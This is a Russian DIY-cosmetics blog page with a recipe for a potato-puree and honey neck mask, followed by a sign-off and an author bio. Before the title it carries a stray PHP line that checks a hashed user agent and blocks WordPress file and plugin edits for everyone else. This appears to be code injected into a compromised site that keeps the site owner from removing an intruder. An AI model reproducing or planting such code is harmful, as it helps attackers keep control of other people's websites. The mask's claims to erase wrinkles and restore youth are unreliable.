if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Восстанавливаем красоту шеи с помощью картофеля | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт маски по уходу за кожей шеи с картофельным пюре

Приходит время и на шее начинают появляться морщины, что очень портит женскую красоту. Но не стоит переживать по этому поводу, выходом станет маска из картофеля

С года­ми на шее начи­на­ют появ­лять­ся мор­щи­ны, что очень пор­тит жен­скую кра­со­ту. Но не сто­ит пере­жи­вать по это­му пово­ду, выхо­дом ста­нет мас­ка из кар­то­фе­ля. Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми издав­на помо­га­ла жен­щи­нам под­дер­жи­вать свою красоту.

В осно­ве мас­ки лежит кар­то­фель­ное пюре. Как толь­ко оно немно­го осты­нет и будет чуть теп­лым берут­ся чай­ная лож­ка меда и 2 ст. л. пюре. Все сме­ши­ва­ем. На сал­фет­ку нано­сит­ся полу­чен­ная смесь. И все это при­кла­ды­ва­ет­ся на шею. Поверх сал­фет­ки мож­но нало­жить шарф. Дер­жать мас­ку 20 минут. Смы­ва­ет­ся мас­ка про­стой водой.

С помо­щью этой мас­ки мож­но изба­вить­ся от мор­щин, увлаж­нить кожу шеи и вер­нуть себе молодость.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!